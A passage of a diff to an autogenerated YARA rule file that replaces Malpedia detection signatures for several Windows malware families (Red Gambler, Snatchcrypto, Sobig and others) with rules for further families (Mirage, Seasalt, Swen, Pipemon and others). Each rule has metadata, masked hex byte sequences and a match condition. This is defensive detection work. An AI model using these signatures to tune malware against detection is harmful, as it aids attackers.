+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.voldemort_auto.yar#L1-L133"
 		license_url = "N/A"
-		logic_hash = "981ff96ccf9321bc9cf0b93466d635ede7fbc6c0341e04e670ea58028783ac37"
+		logic_hash = "f8d7f88b5cd57c32e85ea5f0ae8c31ab594e2a2acc618e6a4574791256fd098d"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -108963,93 +109186,32 @@ rule MALPEDIA_Win_Marap_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e9???????? 8386e41d000002 e9???????? 8386e41d000003 }
-		$sequence_1 = { 7409 8386e41d000008 eb2f 84c0 7908 018ee41d0000 }
-		$sequence_2 = { ff15???????? 8bf0 89b59cfbffff 83feff 7472 }
-		$sequence_3 = { ff15???????? 85c0 7425 8b480c 8b11 8b02 }
-		$sequence_4 = { 81fb00040000 737e 8bc7 8bd7 668b08 }
-		$sequence_5 = { 0fbe84c1f8cb0010 6a07 c1f804 59 }
-		$sequence_6 = { 83c40c 8d7bfe 668b4702 83c702 6685c0 75f4 }
-		$sequence_7 = { 8d1c8580320110 8b03 83e71f c1e706 8a4c3824 }
-		$sequence_8 = { 8d4310 8d8954f40010 5a 668b31 }
-		$sequence_9 = { 80f901 0f8487000000 6683fa06 7519 84c0 }
-
-	condition:
-		7 of them and filesize < 188416
-}
-rule MALPEDIA_Win_Red_Gambler_Auto : FILE
-{
-	meta:
-		description = "autogenerated rule brought to you by yara-signator"
-		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "48807a37-e904-5314-8d0b-afd101b942b7"
-		date = "2024-10-31"
-		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.red_gambler"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.red_gambler_auto.yar#L1-L307"
-		license_url = "N/A"
-		logic_hash = "5df98b37982fcd6fe80d2e1e665e4de08feffa39ad75db51ff52df159597061f"
-		score = 75
-		quality = 73
-		tags = "FILE"
-		version = "1"
-		tool = "yara-signator v0.6.0"
-		signator_config = "callsandjumps;datarefs;binvalue"
-		malpedia_rule_date = "20241030"
-		malpedia_hash = "26e26953c49c8efafbf72a38076855d578e0a2e4"
-		malpedia_version = "20241030"
-		malpedia_license = "CC BY-SA 4.0"
-		malpedia_sharing = "TLP:WHITE"
-
-	strings:
-		$sequence_0 = { 7418 8b95f0feffff 52 8d85f8feffff 50 ff15???????? }
-		$sequence_1 = { 75eb 891e 57 6a00 ff15???????? 50 ff15???????? }
-		$sequence_2 = { 8d5605 56 c645ece9 894ded }
-		$sequence_3 = { 803e20 753b 807e01a2 7535 807e02c3 }
-		$sequence_4 = { ff15???????? 6800010000 56 68???????? e8???????? a1???????? 83c40c }
-		$sequence_5 = { 807801c3 7523 6800010000 50 }
-		$sequence_6 = { 61 8b35???????? 81c6201a0000 ffd6 }
-		$sequence_7 = { 668985f0f8ffff ffd6 50 8d95f2f8ffff }
-		$sequence_8 = { 0e 6706 7e0e 2829 dc03 dc692c 64f33c87 }
-		$sequence_9 = { 93 ee b4ed 2f 2326 50 0f41631c }
-		$sequence_10 = { 9e 54 50 4c 48 44 }
-		$sequence_11 = { 8d8598fdffff 50 68???????? 8d8d98fbffff 68???????? }
-		$sequence_12 = { 6800010000 8d8dfcfdffff 51 6a00 }
-		$sequence_13 = { ff15???????? 8d8594fbffff 50 8d4d98 51 ff15???????? }
-		$sequence_14 = { 8d8d98fbffff 68???????? 51 ff15???????? 83c414 6a00 }
-		$sequence_15 = { 7364 42 e5e1 5f }
-		$sequence_16 = { e600 3e3e25162f062d 2b2a bee7eee947 }
-		$sequence_17 = { 09afba55a367 59 2f 74be }
-		$sequence_18 = { ff15???????? 83c414 6a00 6a00 8d9598fbffff 52 68???????? }
-		$sequence_19 = { 6800010000 8d85fcfeffff 50 6a00 ff15???????? }
-		$sequence_20 = { 7bce 07 93 60 58 0e 4c }
-		$sequence_21 = { cd50 d46e c8603b8d 6e }
-		$sequence_22 = { 8d9598fbffff 52 68???????? 6a00 6a00 ff15???????? 8b4dfc }
-		$sequence_23 = { ff15???????? 6800010000 8d8d98fdffff 51 8d9598feffff 52 ff15???????? }
-		$sequence_24 = { 8d4d98 51 ff15???????? 8d5598 52 8d8598fdffff }
-		$sequence_25 = { 8d8c05fcfeffff 51 8d95fcfeffff 52 }
-		$sequence_26 = { 6a5c 8d8dfcfeffff 51 ff15???????? 8d9405fcfeffff }
-		$sequence_27 = { 8b4508 ff34c5d0814000 ff15???????? 5d c3 6a0c }
-		$sequence_28 = { e8???????? 68???????? ff15???????? 8b7508 c7465c486b4000 83660800 33ff }
-		$sequence_29 = { 8945e4 83f805 7d10 668b4c4310 66890c4580974000 }
-		$sequence_30 = { 55 8bec 8b4508 33c9 3b04cd10804000 7413 41 }
-		$sequence_31 = { 8bd8 ffd7 8b3d???????? 6aff ffd7 ffd3 }
+		$sequence_0 = { 488bd9 4d896bd0 488d0de3ea0200 4d8be8 4d8973c8 0f57c0 4d897bc0 }
+		$sequence_1 = { e8???????? 488bd8 4885c0 7517 488d0daf740300 e8???????? }
+		$sequence_2 = { 4885c0 7517 488d0de43b0300 e8???????? 488bc8 e8???????? 488bd8 }
+		$sequence_3 = { 80fa80 73e9 4c8bc3 4d2bc1 4c3bcb 4d0f47c5 4d85c0 }
+		$sequence_4 = { 488b7c2450 488d0d0e7b0300 e8???????? 488bc8 e8???????? 4c8bac2490000000 488bd8 }
+		$sequence_5 = { 488b8540090000 41b808020000 48894c2468 488d8da0000000 4889442458 4c894c2448 e8???????? }
+		$sequence_6 = { 48894108 488b4710 48894808 48ffc6 493bf7 7caf 4885ff }
+		$sequence_7 = { d3e0 83c107 0bf8 80fa80 73e9 4c8bc3 4d2bc1 }
+		$sequence_8 = { 488bd5 488bce e8???????? 4963de 4803c3 483bc5 7626 }
+		$sequence_9 = { 488bc8 e8???????? 488bd8 4885c0 7517 488d0dde400300 e8???????? }
 
 	condition:
-		7 of them and filesize < 327680
+		7 of them and filesize < 561152
 }
-rule MALPEDIA_Win_Cherry_Picker_Auto : FILE
+rule MALPEDIA_Win_Mirage_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "85645a18-926d-5b0e-9fa0-dbb70398619f"
+		id = "f68fe58b-43a1-51bc-9791-76dd178418d5"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cherry_picker"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.cherry_picker_auto.yar#L1-L116"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mirage"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.mirage_auto.yar#L1-L168"
 		license_url = "N/A"
-		logic_hash = "d063fae0bccc43dbf0d60b6c18c60c6de12439bcf31003957c363036cbe5a98f"
+		logic_hash = "4d8628bd678dab095b081b63d7dce2fda51131fe49ad45959de9c07d1338533f"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -109063,32 +109225,38 @@ rule MALPEDIA_Win_Cherry_Picker_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83c8ff 56 90 8bf0 0fbec9 81e6ff000000 }
-		$sequence_1 = { 68???????? 68???????? a3???????? ffd6 68???????? 6a3c }
-		$sequence_2 = { 69c0e8030000 68???????? 6a01 68???????? 68???????? a3???????? }
-		$sequence_3 = { 52 8d442428 50 ff542420 }
-		$sequence_4 = { 41 84d2 75f6 8b3d???????? }
-		$sequence_5 = { 7512 68???????? 50 50 ff15???????? a3???????? }
-		$sequence_6 = { a1???????? 56 6aff 50 8bf1 }
-		$sequence_7 = { 83c408 2bf2 8a11 88140e 41 84d2 }
-		$sequence_8 = { 8a0d???????? ba???????? 83c8ff 56 }
-		$sequence_9 = { 6aff 50 ffd3 6a00 6a00 }
+		$sequence_0 = { c745f804010000 ff75fc ff15???????? ff75fc }
+		$sequence_1 = { 59 3bc3 59 7412 83c005 50 8d85ecfeffff }
+		$sequence_2 = { 83c428 8935???????? b001 5f 5e 5b }
+		$sequence_3 = { 8d45f4 50 53 68???????? c745f804010000 ff75fc }
+		$sequence_4 = { be14410000 8d85d4beffff 56 53 50 e8???????? }
+		$sequence_5 = { 7407 68f4010000 eb06 ff35???????? ff15???????? }
+		$sequence_6 = { e8???????? 83c41c 8935???????? 8ac3 }
+		$sequence_7 = { ff75fc ff15???????? 8b8514010000 2b7df4 8985e0bfffff 8d450d }
+		$sequence_8 = { 8d8520010000 56 50 e8???????? 8b4510 }
+		$sequence_9 = { 6801000080 ff15???????? 85c0 7556 }
+		$sequence_10 = { 889590fcffff 33db f3ab 66ab 8d8d90feffff 895dfc }
+		$sequence_11 = { 755d 8b06 385d08 8b08 }
+		$sequence_12 = { 83c414 8d8530fbffff 53 50 e8???????? 59 50 }
+		$sequence_13 = { 50 ff15???????? 8d4d9c 885dfc e8???????? }
+		$sequence_14 = { 894518 e8???????? 8bf8 59 85ff 7504 33c0 }
+		$sequence_15 = { 7405 83f847 7517 8d860c010000 }
 
 	condition:
-		7 of them and filesize < 712704
+		7 of them and filesize < 1695744
 }
-rule MALPEDIA_Win_Quantloader_Auto : FILE
+rule MALPEDIA_Win_Seasalt_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "432b5f56-9f20-5011-836d-a160f44f614d"
+		id = "e8758fcf-84ae-529e-8419-cd8aeff0784f"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.quantloader"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.quantloader_auto.yar#L1-L168"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.seasalt"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.seasalt_auto.yar#L1-L113"
 		license_url = "N/A"
-		logic_hash = "35c517bd3ba01671a26eeca12557e31f89943cd497a56be614b2b507cc9bda11"
+		logic_hash = "5df2d6a2f6a4936e4945854f6bc4e70b294eb2b72f1c3ef6c84a2efa72215e6e"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -109102,38 +109270,32 @@ rule MALPEDIA_Win_Quantloader_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 48 89442408 c744240401000000 c70424???????? }
-		$sequence_1 = { 83ec18 c744240800040000 c744240400000000 c70424???????? e8???????? c7442404???????? }
-		$sequence_2 = { e8???????? 89c2 c744241000000000 8d45fc }
-		$sequence_3 = { 8d45f8 89442410 c744240c19010200 c744240800000000 8b450c 89442404 }
-		$sequence_4 = { c70424???????? e8???????? ff05???????? 0fb645fb 83f801 7546 }
-		$sequence_5 = { c70424???????? e8???????? e8???????? 89442404 c70424???????? e8???????? c7442404???????? }
-		$sequence_6 = { 83ec18 8b4510 8845ff c745f800020000 }
-		$sequence_7 = { c70424???????? e8???????? c70424???????? e8???????? 0fb6c0 83f801 }
-		$sequence_8 = { 8bfe ad 85c0 75fb 2bf7 8bce }
-		$sequence_9 = { 5f 5e 5b ebed 61 }
-		$sequence_10 = { 60 837d5400 7425 64ff3530000000 59 8b490c 8b490c }
-		$sequence_11 = { 51 33c9 41 2bc2 }
-		$sequence_12 = { 8bc6 8bf7 3bc5 7403 }
-		$sequence_13 = { ab 83e903 e2db 61 }
-		$sequence_14 = { 8bfe 8bca e8???????? 33c0 50 c1c807 c104240d }
-		$sequence_15 = { 39411c 74f7 ff711c 8f4550 e8???????? 8f411c }
+		$sequence_0 = { 33c0 f2ae f7d1 83c1f3 }
+		$sequence_1 = { eb02 33c0 0fbe84c660a20010 c1f804 83f807 }
+		$sequence_2 = { 40 3d00010000 7cef b950000000 }
+		$sequence_3 = { 8dbdd8fdffff 897de8 803f00 7433 }
+		$sequence_4 = { 89442420 b911000000 33c0 8d7c2424 f3ab }
+		$sequence_5 = { 0fb6fa 3bc7 7714 8b55fc 8a92c0cc0010 089001da0010 }
+		$sequence_6 = { 891d???????? c705????????03000000 8935???????? 8935???????? ffd7 }
+		$sequence_7 = { 896c2428 ffd6 8d4c2410 53 51 68???????? 68???????? }
+		$sequence_8 = { 8dbc2419020000 c684241802000000 f3ab 66ab 6a00 }
+		$sequence_9 = { 7765 ff2485f4130010 8b0d???????? 68???????? }
 
 	condition:
-		7 of them and filesize < 155648
+		7 of them and filesize < 139264
 }
-rule MALPEDIA_Win_Snatchcrypto_Auto : FILE
+rule MALPEDIA_Win_Cradlecore_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "a0e595f3-b394-5bbb-9fbf-3f77b7a2ff1c"
+		id = "c02dd3cc-a2fa-5db2-b15e-6536b0232a3b"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.snatchcrypto"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.snatchcrypto_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cradlecore"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.cradlecore_auto.yar#L1-L129"
 		license_url = "N/A"
-		logic_hash = "df174efff90118ed4513d3543230102fa070bff240e3fca742525b945490dabd"
+		logic_hash = "e4b2ddac2d160e24e50f2cbbb671c4c77a767dbac5be4d1bf9ebefaf8002be13"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -109147,32 +109309,32 @@ rule MALPEDIA_Win_Snatchcrypto_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 413ac5 740d 3c03 7514 80be9102000000 750b f6c180 }
-		$sequence_1 = { 0100 d3da 0100 4bdb01 0038 db01 0096db010096 }
-		$sequence_2 = { 4c8d25e5930300 41c70701000000 e9???????? 498b95b8000000 488d0dc3930300 41b805000000 e8???????? }
-		$sequence_3 = { 7821 0f1f840000000000 4533c9 488d542420 488bcb 458d4120 ff15???????? }
-		$sequence_4 = { e9???????? 488bd3 498bcd e8???????? 85c0 7414 488d15669d0300 }
-		$sequence_5 = { 412bc9 4103cf 3bce 0f42f1 418bcf 482bd1 8bcd }
-		$sequence_6 = { 413bc4 0f87d3000000 6685f6 0f84c5000000 41bd04000000 0f1f00 66443bee }
-		$sequence_7 = { 498d4b02 488d942450020000 482bd1 0fb701 4883c102 6689440afe 6685c0 }
-		$sequence_8 = { 753f 488b5f08 4883c708 4885db 75e4 488d157dd30300 4d8bc4 }
-		$sequence_9 = { 488bd9 4883c108 33f6 e8???????? 85c0 7413 817b3463feffff }
+		$sequence_0 = { 7402 2bf8 6aff 6a00 8d45d8 8bce }
+		$sequence_1 = { 8b048db8734000 ffe0 f7c703000000 7515 c1e902 83e203 }
+		$sequence_2 = { 6a00 ff7508 8b16 ff5238 8ac8 }
+		$sequence_3 = { 33f6 46 837de810 8bc1 7303 8d45d4 03c6 }
+		$sequence_4 = { 837f1410 894dd8 7204 8b07 eb02 8bc7 803c103d }
+		$sequence_5 = { 0f8f4dffffff 7c08 85f6 0f8543ffffff 8b4c240c 8b542410 5f }
+		$sequence_6 = { ff15???????? 85c0 7514 6a07 8d45d0 50 6a01 }
+		$sequence_7 = { 57 ffd6 6a04 8d4508 c7450803000000 50 }
+		$sequence_8 = { e8???????? 395f40 7527 ff7750 885c2413 8d442413 33db }
+		$sequence_9 = { 894108 8d4d90 c645fc05 e8???????? 6a00 ff7508 8d8d24feffff }
 
 	condition:
-		7 of them and filesize < 1400832
+		7 of them and filesize < 450560
 }
-rule MALPEDIA_Win_Sobig_Auto : FILE
+rule MALPEDIA_Win_Swen_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "1db89ea4-c7b4-580a-8658-7872983b45bd"
+		id = "d8e32210-7f2c-5375-83fe-4881f384b16a"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sobig"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.sobig_auto.yar#L1-L122"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.swen"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.swen_auto.yar#L1-L130"
 		license_url = "N/A"
-		logic_hash = "703647dd78e5c80dff25867b8b892bf4ae4d1517eb9d703a33dee66b43a14d30"
+		logic_hash = "ac8d371caed7f28c7b47b5b751d92511f3b33ed896fd2d2cdf37fc7b9a540873"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -109186,32 +109348,32 @@ rule MALPEDIA_Win_Sobig_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 6a01 8d4db8 e8???????? 83c8ff e9???????? 6a30 }
-		$sequence_1 = { ff750c 8d4dbc e8???????? 6a01 8d7e20 5b }
-		$sequence_2 = { 83650800 c7451008000000 0fb6450f 32d2 }
-		$sequence_3 = { e8???????? 8bf8 ff7614 8d4d90 c645fc04 e8???????? }
-		$sequence_4 = { 5e 8a1408 80faff 8811 7401 47 }
-		$sequence_5 = { 8b4630 6a01 8985e4feffff 58 53 8d8de0feffff 53 }
-		$sequence_6 = { 8d45bc 50 8bcf 895dfc e8???????? 83780800 0f94c0 }
-		$sequence_7 = { 3bc8 0f8496000000 8bd9 8d4de8 }
-		$sequence_8 = { 68???????? 6801000080 8d4d08 e8???????? 8b45ec c7451094624100 }
-		$sequence_9 = { 8a1f 47 83f80b 0f8777020000 ff2485563b4100 }
+		$sequence_0 = { 6a03 68000000c0 8d8574ffffff 50 8b1d???????? }
+		$sequence_1 = { 834dfcff e9???????? e8???????? 85c0 0f8609010000 83a5388affff00 6a00 }
+		$sequence_2 = { 50 ff7508 57 8d85e0feffff 50 ffd6 83c410 }
+		$sequence_3 = { 85c0 0f8401030000 68???????? 68???????? 8d8574ffffff 50 8b35???????? }
+		$sequence_4 = { e8???????? 8d8504fbffff 50 57 e8???????? 6a70 57 }
+		$sequence_5 = { 8bf8 897dd8 85ff 7510 8b8570ffffff 8dbc0560dfffff 897dd8 }
+		$sequence_6 = { 6a03 bf000000c0 57 68???????? 8d850cffffff 50 e8???????? }
+		$sequence_7 = { ff15???????? 8945e0 3bc6 740e 6a01 56 }
+		$sequence_8 = { 53 6a06 ff15???????? 53 ff15???????? 8b4df0 64890d00000000 }
+		$sequence_9 = { ff7508 ff75e4 8d85d8feffff 50 e8???????? 83c40c }
 
 	condition:
-		7 of them and filesize < 262144
+		7 of them and filesize < 286720
 }
-rule MALPEDIA_Win_Rincux_Auto : FILE
+rule MALPEDIA_Win_Tokyox_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "8d755739-a59d-591b-8d5d-874be1eebc41"
+		id = "57574695-5c21-57dd-9f3e-5c009f7654f6"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rincux"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.rincux_auto.yar#L1-L128"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tokyox"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.tokyox_auto.yar#L1-L121"
 		license_url = "N/A"
-		logic_hash = "7c862e7ddc61d94d5055385764a3b34165e25fd304c6c127ff548146450f782d"
+		logic_hash = "e5ebbfb35065dbc14f8f4e75c7bbc71cffc1206aa4b5e3c10e8410f8c2a12bf7"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -109225,32 +109387,32 @@ rule MALPEDIA_Win_Rincux_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8bce 52 e8???????? 8bf8 8d8424d0040000 50 8bce }
-		$sequence_1 = { 7348 e9???????? 8b4c2458 8b6c2414 c7411880730210 c7001d000000 eb2c }
-		$sequence_2 = { 83ff07 6810010000 752a e8???????? 83c404 89442418 85c0 }
-		$sequence_3 = { 7e5d 8b4518 89442410 eb04 8b5c2418 8b4c2410 }
-		$sequence_4 = { 83fd03 7330 85ff 0f840e0c0000 33c9 8b442410 }
-		$sequence_5 = { e8???????? 8d4c2400 c784247c010000ffffffff e8???????? }
-		$sequence_6 = { 8bca 83e103 f3a4 8dbc2438040000 83c9ff f2ae f7d1 }
-		$sequence_7 = { c1ea08 89500c 8b4310 f6c402 7425 8b442410 8d4c2424 }
-		$sequence_8 = { c7856cfdffff18000000 e8???????? 8bce e8???????? 33c0 8b4df4 }
-		$sequence_9 = { ffd7 8d84246c030000 6804010000 50 ffd3 8d8c246c030000 68???????? }
+		$sequence_0 = { ff700c 8b08 ff7008 e8???????? 8945e4 3de22e0000 }
+		$sequence_1 = { 50 ff7508 c745fc616d6500 ff15???????? }
+		$sequence_2 = { 8bce 83c40c 33c0 668907 8d5101 }
+		$sequence_3 = { 8d45fc 8b35???????? 50 6a1f }
+		$sequence_4 = { 6689047e eb18 52 8d85f0faffff c645a000 50 ff75a0 }
+		$sequence_5 = { 6a00 68e9fd0000 ff15???????? 8b450c 8930 33f6 eb11 }
+		$sequence_6 = { 3de22e0000 74d8 6a01 ff7508 }
+		$sequence_7 = { 8d85ecefffff 6a00 50 e8???????? 83c40c c7451000000000 }
+		$sequence_8 = { 8d8df0fcffff 8d45c8 0f4345c8 51 50 ff15???????? 8bf8 }
+		$sequence_9 = { 56 6a00 6a01 ff15???????? 8bcb 8d5102 90 }
 
 	condition:
-		7 of them and filesize < 392192
+		7 of them and filesize < 237568
 }
-rule MALPEDIA_Win_Fengine_Auto : FILE
+rule MALPEDIA_Win_Rerdom_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "86d29f99-f72a-503a-9d9e-5f6528fd35ad"
+		id = "fe806d9a-6a04-5e79-b88b-ee8b8a204978"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.fengine"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.fengine_auto.yar#L1-L117"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rerdom"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.rerdom_auto.yar#L1-L133"
 		license_url = "N/A"
-		logic_hash = "478947e69dab969c41feba1f394b054f84256d37e12b1c78c512e724084a67ab"
+		logic_hash = "a2ea86fac59908c343fcb877dddd42001d84b6d42ea05066c82f8a9e14242c06"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -109264,32 +109426,32 @@ rule MALPEDIA_Win_Fengine_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 33ff c6041000 898df4efffff 85c0 }
-		$sequence_1 = { 75e5 8d85b8feffff 50 ff15???????? }
-		$sequence_2 = { e8???????? 83c408 85c0 750f c705????????02000000 }
-		$sequence_3 = { 897e70 6a43 58 668986b8000000 668986be010000 c74668d0154100 6a0d }
-		$sequence_4 = { 8d55cc 8bce c745cc8b85d4fe c745d0ffff8b70 }
-		$sequence_5 = { 53 8d4e04 6800080000 51 }
-		$sequence_6 = { e8???????? ebb4 c745e448294100 a1???????? eb1a c745e444294100 a1???????? }
-		$sequence_7 = { c1e706 8b048560514100 83c00c 03c7 50 ff15???????? 33c0 }
-		$sequence_8 = { 6a43 58 668986b8000000 668986be010000 c74668d0154100 }
-		$sequence_9 = { 8b5e24 c1e003 50 03fa 03da e8???????? }
+		$sequence_0 = { 33f6 85ff 740d 8b04b3 e8???????? 46 3bf7 }
+		$sequence_1 = { 57 ba???????? 52 e8???????? 52 ff15???????? e8???????? }
+		$sequence_2 = { 8b3e 8bc3 e8???????? 8945fc 83f8ff 751a 85db }
+		$sequence_3 = { 8d44244c 50 ff15???????? 6a01 53 53 }
+		$sequence_4 = { 8bf0 58 c745f804000000 e8???????? 8bd0 8955f4 85d2 }
+		$sequence_5 = { 7576 8b4610 85c0 740a 8a00 3c0e 7404 }
+		$sequence_6 = { 6a0d 2bc6 5a 3bc2 7211 57 8bc2 }
+		$sequence_7 = { ff7508 e8???????? 3bc7 0f85c4000000 8b450c 85c0 0f84b9000000 }
+		$sequence_8 = { 6a01 8d45cc e8???????? 84c0 0f84ab010000 8975fc 8975f8 }
+		$sequence_9 = { ffd7 53 ffd6 8325????????00 ff74241c ffd7 ff74241c }
 
 	condition:
-		7 of them and filesize < 210944
+		7 of them and filesize < 352256
 }
-rule MALPEDIA_Win_Unidentified_104_Auto : FILE
+rule MALPEDIA_Win_Dyepack_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "d500f181-7347-5b56-b769-5ef7ee00cd2b"
+		id = "3c6c274a-3d73-5c98-98aa-7fd5f4c3842b"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_104"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.unidentified_104_auto.yar#L1-L130"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dyepack"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.dyepack_auto.yar#L1-L124"
 		license_url = "N/A"
-		logic_hash = "4ebfb796f6d86b2c125f5dfb97b85200528b313a6e20e5b2b0501c20db7c82f7"
+		logic_hash = "b32504dab3948f7d9f4359ced9850f6b13ecbdf66af15ac79005f7fe62b0a577"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -109303,32 +109465,32 @@ rule MALPEDIA_Win_Unidentified_104_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 7607 ff15???????? cc e8???????? 0f117570 }
-		$sequence_1 = { 4c33df 498bcb 49c1eb18 48c1e128 4933cb 4c8b9c2490000000 }
-		$sequence_2 = { 0f1030 0f107810 4c896810 48c740180f000000 448828 488b9588000000 483bd3 }
-		$sequence_3 = { 0f2975a7 448b4d6f 4c8bc6 488d55e7 488d4d97 e8???????? 83f801 }
-		$sequence_4 = { 488d4d88 e8???????? 488d158f550100 488d4d88 e8???????? cc }
-		$sequence_5 = { 4183fd04 7d22 b804000000 488d4d48 412bc5 33d2 4c63c0 }
-		$sequence_6 = { 0f107507 0f2975a7 488d4d97 e8???????? 48b884afc053ee926aaf 488945e7 48b9a4ee4415aba19f06 }
-		$sequence_7 = { e8???????? 448b0b 4533c0 4585c9 0f84be000000 4c8d15b4b4ffff 488b4318 }
-		$sequence_8 = { 488d3c10 4d8bc4 488bcf 33d2 e8???????? 46883427 eb0e }
-		$sequence_9 = { 488d5304 448bc6 488bcf e8???????? 488d5308 448bc6 488bcf }
+		$sequence_0 = { 8b4c2410 33ed 33ff 3bc3 }
+		$sequence_1 = { ff15???????? 8b8c2428100000 53 51 e8???????? 83c408 5d }
+		$sequence_2 = { 8d4c2418 53 51 8d54242c }
+		$sequence_3 = { 8d44242c 51 50 56 ff15???????? 85c0 }
+		$sequence_4 = { 53 52 8d44242c 51 50 56 ff15???????? }
+		$sequence_5 = { 6a03 53 aa 8b842434100000 53 6800000040 50 }
+		$sequence_6 = { 3bf8 7cb2 7f08 8b4c2410 3be9 72ac 56 }
+		$sequence_7 = { 8b842434100000 53 6800000040 50 ff15???????? 8bf0 }
+		$sequence_8 = { 52 56 ff15???????? 56 ff15???????? 8d442410 895c2410 }
+		$sequence_9 = { ff15???????? 56 ff15???????? 8d442410 895c2410 }
 
 	condition:
-		7 of them and filesize < 263168
+		7 of them and filesize < 212992
 }
-rule MALPEDIA_Win_Tarsip_Auto : FILE
+rule MALPEDIA_Win_Pipemon_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ee7f1e65-623e-5bf6-9501-f2cb0191dbfa"
+		id = "4aaf45d7-d465-5241-bf1c-8e05e9105546"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tarsip"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.tarsip_auto.yar#L1-L129"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pipemon"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.pipemon_auto.yar#L1-L123"
